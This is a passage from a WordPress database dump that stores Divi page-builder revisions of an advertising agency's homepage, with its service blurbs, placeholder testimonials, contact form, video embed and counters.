body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:23:47','2020-08-07 20:23:47','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(614,1,'2020-08-07 20:24:39','2020-08-07 20:24:39','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image 